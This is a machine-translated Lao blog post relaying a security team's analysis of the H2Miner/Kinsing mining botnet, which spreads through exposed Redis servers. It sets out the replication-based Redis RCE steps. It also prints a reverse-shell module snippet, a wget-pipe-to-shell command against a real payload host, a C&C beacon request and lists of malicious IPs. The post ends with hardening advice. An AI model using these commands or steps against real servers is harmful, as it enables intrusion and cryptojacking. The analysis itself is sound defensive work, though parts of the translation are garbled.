ການລະບາດໃຫມ່ຂອງແມ່ທ້ອງ H2Miner ໄດ້ຖືກຄົ້ນພົບທີ່ຂຸດຄົ້ນ Redis RCE

ມື້ກ່ອນຫນ້ານີ້, ຫນຶ່ງໃນເຄື່ອງແມ່ຂ່າຍຂອງໂຄງການຂອງຂ້ອຍຖືກໂຈມຕີໂດຍແມ່ທ້ອງທີ່ຄ້າຍຄືກັນ. ເພື່ອຊອກຫາຄໍາຕອບຂອງຄໍາຖາມ "ອັນນັ້ນແມ່ນຫຍັງ?" ຂ້ອຍພົບບົດຄວາມທີ່ດີໂດຍທີມງານ Alibaba Cloud Security. ເນື່ອງ​ຈາກ​ວ່າ​ຂ້າ​ພະ​ເຈົ້າ​ບໍ່​ໄດ້​ຊອກ​ຫາ​ບົດ​ຄວາມ​ນີ້​ກ່ຽວ​ກັບ Habre, ຂ້າ​ພະ​ເຈົ້າ​ໄດ້​ຕັດ​ສິນ​ໃຈ​ທີ່​ຈະ​ແປ​ມັນ​ໂດຍ​ສະ​ເພາະ​ແມ່ນ​ສໍາ​ລັບ​ທ່ານ <3

ເຂົ້າ

ບໍ່ດົນມານີ້, ທີມງານຄວາມປອດໄພຂອງ Alibaba Cloud ໄດ້ຄົ້ນພົບການລະບາດຂອງ H2Miner ຢ່າງກະທັນຫັນ. ແມ່ພະຍາດທີ່ເປັນອັນຕະລາຍນີ້ໃຊ້ການຂາດການອະນຸຍາດຫຼືລະຫັດຜ່ານທີ່ອ່ອນແອສໍາລັບ Redis ເປັນປະຕູສູ່ລະບົບຂອງເຈົ້າ, ຫຼັງຈາກນັ້ນມັນ synchronizes ໂມດູນອັນຕະລາຍຂອງຕົນເອງກັບ slave ໂດຍຜ່ານການ synchronization ນາຍ-slave ແລະສຸດທ້າຍໄດ້ດາວໂຫລດໂມດູນອັນຕະລາຍນີ້ໃສ່ເຄື່ອງທີ່ຖືກໂຈມຕີແລະປະຕິບັດອັນຕະລາຍ. ຄໍາແນະນໍາ.

ໃນອະດີດ, ການໂຈມຕີໃນລະບົບຂອງທ່ານສ່ວນໃຫຍ່ແມ່ນດໍາເນີນໂດຍວິທີການທີ່ກ່ຽວຂ້ອງກັບວຽກງານທີ່ກໍານົດໄວ້ຫຼືປຸ່ມ SSH ທີ່ຖືກຂຽນໄວ້ໃນເຄື່ອງຂອງທ່ານຫຼັງຈາກທີ່ຜູ້ໂຈມຕີເຂົ້າສູ່ລະບົບ Redis. ໂຊກດີ, ວິທີການນີ້ບໍ່ສາມາດຖືກນໍາໃຊ້ເລື້ອຍໆເນື່ອງຈາກມີບັນຫາກັບການຄວບຄຸມການອະນຸຍາດຫຼືເນື່ອງຈາກສະບັບຂອງລະບົບທີ່ແຕກຕ່າງກັນ. ຢ່າງໃດກໍ່ຕາມ, ວິທີການໂຫຼດໂມດູນທີ່ເປັນອັນຕະລາຍນີ້ສາມາດປະຕິບັດຄໍາສັ່ງຂອງຜູ້ໂຈມຕີໂດຍກົງຫຼືເຂົ້າເຖິງ shell, ເຊິ່ງເປັນອັນຕະລາຍສໍາລັບລະບົບຂອງທ່ານ.

ເນື່ອງຈາກຈໍານວນເຄື່ອງແມ່ຂ່າຍ Redis ຈໍານວນຫລາຍທີ່ໂຮດຢູ່ໃນອິນເຕີເນັດ (ເກືອບ 1 ລ້ານ), ທີມງານຄວາມປອດໄພຂອງ Alibaba Cloud, ເປັນຄໍາເຕືອນທີ່ເປັນມິດ, ແນະນໍາໃຫ້ຜູ້ໃຊ້ບໍ່ແບ່ງປັນ Redis ອອນໄລນ໌ແລະກວດເບິ່ງຄວາມເຂັ້ມງວດຂອງລະຫັດຜ່ານຂອງພວກເຂົາຢ່າງເປັນປົກກະຕິແລະວ່າພວກເຂົາຖືກທໍາລາຍ. ການຄັດເລືອກໄວ.

H2 Miner

H2Miner ເປັນ botnet ຂຸດຄົ້ນບໍ່ແຮ່ສໍາລັບລະບົບ Linux ທີ່ສາມາດບຸກລຸກລະບົບຂອງທ່ານໃນຫຼາຍໆດ້ານ, ລວມທັງການຂາດການອະນຸຍາດໃນ Hadoop yarn, Docker, ແລະ Redis remote command execution (RCE) vulnerabilities. botnet ເຮັດວຽກໂດຍການດາວໂຫຼດສະຄຣິບທີ່ເປັນອັນຕະລາຍ ແລະ malware ເພື່ອຂຸດຄົ້ນຂໍ້ມູນຂອງທ່ານ, ຂະຫຍາຍການໂຈມຕີຕາມແນວນອນ, ແລະຮັກສາການສື່ສານຄໍາສັ່ງ ແລະການຄວບຄຸມ (C&C).

Redis RCE

ຄວາມຮູ້ກ່ຽວກັບເລື່ອງນີ້ໄດ້ຖືກແບ່ງປັນໂດຍ Pavel Toporkov ທີ່ ZeroNights 2018. ຫຼັງຈາກເວີຊັນ 4.0, Redis ສະຫນັບສະຫນູນຄຸນສົມບັດການໂຫຼດ plug-in ທີ່ໃຫ້ຜູ້ໃຊ້ສາມາດໂຫລດໄດ້ດັ່ງນັ້ນໄຟລ໌ທີ່ລວບລວມດ້ວຍ C ເຂົ້າໄປໃນ Redis ເພື່ອປະຕິບັດຄໍາສັ່ງສະເພາະ Redis. ຟັງຊັນນີ້, ເຖິງແມ່ນວ່າເປັນປະໂຫຍດ, ມີຊ່ອງໂຫວ່ທີ່, ໃນໂຫມດແມ່ບົດ-slave, ໄຟລ໌ສາມາດຖືກ synchronized ກັບ slave ຜ່ານໂຫມດ fullresync. ນີ້ສາມາດຖືກນໍາໃຊ້ໂດຍຜູ້ໂຈມຕີເພື່ອໂອນໄຟລ໌ທີ່ເປັນອັນຕະລາຍ. ຫຼັງຈາກການໂອນຍ້າຍສໍາເລັດ, ຜູ້ໂຈມຕີຈະໂຫລດໂມດູນໃສ່ຕົວຢ່າງ Redis ທີ່ຖືກໂຈມຕີແລະປະຕິບັດຄໍາສັ່ງໃດໆ.

ການວິເຄາະແມ່ທ້ອງ Malware

ບໍ່ດົນມານີ້, ທີມງານຄວາມປອດໄພຂອງ Alibaba Cloud ຄົ້ນພົບວ່າຂະຫນາດຂອງກຸ່ມແຮ່ທາດທີ່ເປັນອັນຕະລາຍ H2Miner ໄດ້ເພີ່ມຂຶ້ນຢ່າງກະທັນຫັນ. ອີງຕາມການວິເຄາະ, ຂະບວນການທົ່ວໄປຂອງການປະກົດຕົວຂອງການໂຈມຕີແມ່ນມີດັ່ງນີ້:

H2Miner ໃຊ້ RCE Redis ສໍາລັບການໂຈມຕີຢ່າງເຕັມທີ່. ຜູ້ໂຈມຕີທໍາອິດໂຈມຕີເຄື່ອງແມ່ຂ່າຍຂອງ Redis ທີ່ບໍ່ມີການປ້ອງກັນຫຼືເຄື່ອງແມ່ຂ່າຍທີ່ມີລະຫັດຜ່ານທີ່ອ່ອນແອ.

ຫຼັງຈາກນັ້ນ, ພວກເຂົາໃຊ້ຄໍາສັ່ງ config set dbfilename red2.so ເພື່ອປ່ຽນຊື່ໄຟລ໌. ຫຼັງຈາກນີ້, ຜູ້ໂຈມຕີປະຕິບັດຄໍາສັ່ງ slaveof ເພື່ອກໍານົດທີ່ຢູ່ host replication master-slave.

ເມື່ອຕົວຢ່າງ Redis ທີ່ຖືກໂຈມຕີສ້າງການເຊື່ອມຕໍ່ແມ່ບົດ - slave ກັບ Redis ອັນຕະລາຍທີ່ເປັນເຈົ້າຂອງໂດຍຜູ້ໂຈມຕີ, ຜູ້ໂຈມຕີສົ່ງໂມດູນທີ່ຕິດເຊື້ອໂດຍໃຊ້ຄໍາສັ່ງ fullresync ເພື່ອ synchronize ໄຟລ໌. ຫຼັງຈາກນັ້ນ, ໄຟລ໌ red2.so ຈະຖືກດາວໂຫຼດໃສ່ເຄື່ອງທີ່ຖືກໂຈມຕີ. ຫຼັງຈາກນັ້ນ, ຜູ້ໂຈມຕີໃຊ້ໂມດູນການໂຫຼດ ./red2.so ເພື່ອໂຫລດໄຟລ໌ນີ້. ໂມດູນສາມາດປະຕິບັດຄໍາສັ່ງຈາກຜູ້ໂຈມຕີຫຼືລິເລີ່ມການເຊື່ອມຕໍ່ທາງກັບ (backdoor) ເພື່ອເຂົ້າເຖິງເຄື່ອງຈັກທີ່ຖືກໂຈມຕີ.

if (RedisModule_CreateCommand(ctx, "system.exec",
        DoCommand, "readonly", 1, 1, 1) == REDISMODULE_ERR)
        return REDISMODULE_ERR;
      if (RedisModule_CreateCommand(ctx, "system.rev",
        RevShellCommand, "readonly", 1, 1, 1) == REDISMODULE_ERR)
        return REDISMODULE_ERR;

ຫຼັງຈາກປະຕິບັດຄໍາສັ່ງເປັນອັນຕະລາຍເຊັ່ນ: / bin / sh -c wget -q -O-http://195.3.146.118/unk.sh | sh> / dev / null 2> & 1, ຜູ້ໂຈມຕີຈະຣີເຊັດຊື່ໄຟລ໌ສຳຮອງ ແລະຖອນຕົວໂມດູນລະບົບເພື່ອທຳຄວາມສະອາດຮ່ອງຮອຍ. ຢ່າງໃດກໍ່ຕາມ, ໄຟລ໌ red2.so ຈະຍັງຄົງຢູ່ໃນເຄື່ອງທີ່ຖືກໂຈມຕີ. ຜູ້ໃຊ້ໄດ້ຖືກແນະນໍາໃຫ້ເອົາໃຈໃສ່ກັບການປະກົດຕົວຂອງໄຟລ໌ທີ່ຫນ້າສົງໄສດັ່ງກ່າວຢູ່ໃນໂຟນເດີຂອງຕົວຢ່າງ Redis ຂອງພວກເຂົາ.

ນອກເຫນືອຈາກການຂ້າຂະບວນການອັນຕະລາຍບາງຢ່າງເພື່ອລັກຊັບພະຍາກອນ, ຜູ້ໂຈມຕີຍັງຕິດຕາມສະຄິບທີ່ເປັນອັນຕະລາຍໂດຍການດາວໂຫລດແລະປະຕິບັດໄຟລ໌ binary ທີ່ເປັນອັນຕະລາຍໄປຫາ 142.44.191.122/ຍາດຕິພີ່ນ້ອງ. ນີ້ຫມາຍຄວາມວ່າຊື່ຂະບວນການຫຼືຊື່ໄດເລກະທໍລີທີ່ມີ kinsing ໃນໂຮດອາດຈະຊີ້ບອກວ່າເຄື່ອງນັ້ນໄດ້ຕິດເຊື້ອໄວຣັດນີ້.

ອີງຕາມຜົນໄດ້ຮັບດ້ານວິສະວະກໍາຍ້ອນກັບ, malware ສ່ວນໃຫຍ່ປະຕິບັດຫນ້າທີ່ດັ່ງຕໍ່ໄປນີ້:

• ອັບໂຫຼດໄຟລ໌ ແລະດໍາເນີນການໃຫ້ເຂົາເຈົ້າ
• ການຂຸດຄົ້ນບໍ່ແຮ່
• ການຮັກສາການສື່ສານ C&C ແລະປະຕິບັດຄໍາສັ່ງຂອງຜູ້ໂຈມຕີ

ໃຊ້ masscan ສໍາລັບການສະແກນພາຍນອກເພື່ອຂະຫຍາຍອິດທິພົນຂອງທ່ານ. ນອກຈາກນັ້ນ, ທີ່ຢູ່ IP ຂອງເຊີບເວີ C&C ແມ່ນ hard-coded ໃນໂປລແກລມ, ແລະເຈົ້າພາບທີ່ຖືກໂຈມຕີຈະຕິດຕໍ່ສື່ສານກັບເຄື່ອງແມ່ຂ່າຍການສື່ສານ C&C ໂດຍໃຊ້ຄໍາຮ້ອງຂໍ HTTP, ບ່ອນທີ່ຂໍ້ມູນ zombie (ເຄື່ອງແມ່ຂ່າຍທີ່ຖືກທໍາລາຍ) ຖືກລະບຸໄວ້ໃນສ່ວນຫົວ HTTP.

GET /h HTTP/1.1
Host: 91.215.169.111
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
Arch: amd64
Cores: 2
Mem: 3944
Os: linux
Osname: debian
Osversion: 10.0
Root: false
S: k
Uuid: xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxx
Version: 26
Accept-Encoding: gzip

ວິທີການໂຈມຕີອື່ນໆ

ທີ່ຢູ່ ແລະການເຊື່ອມຕໍ່ທີ່ໃຊ້ໂດຍແມ່ທ້ອງ

/ຍາດຕິພີ່ນ້ອງ

• 142.44.191.122/t.sh
• 185.92.74.42/h.sh
• 142.44.191.122/spr.sh
• 142.44.191.122/spre.sh
• 195.3.146.118/unk.sh

s&c

• 45.10.88.102
• 91.215.169.111
• 139.99.50.255
• 46.243.253.167
• 195.123.220.193

ຄໍາແນະນໍາ

ຫນ້າທໍາອິດ, Redis ບໍ່ຄວນສາມາດເຂົ້າເຖິງໄດ້ຈາກອິນເຕີເນັດແລະຄວນໄດ້ຮັບການປ້ອງກັນດ້ວຍລະຫັດຜ່ານທີ່ເຂັ້ມແຂງ. ມັນຍັງມີຄວາມສໍາຄັນທີ່ລູກຄ້າກວດເບິ່ງວ່າບໍ່ມີໄຟລ໌ red2.so ໃນໄດເລກະທໍລີ Redis ແລະບໍ່ມີ "kinsing" ໃນຊື່ໄຟລ໌ / ຂະບວນການຢູ່ໃນໂຮດ.

ແຫຼ່ງຂໍ້ມູນ: www.habr.com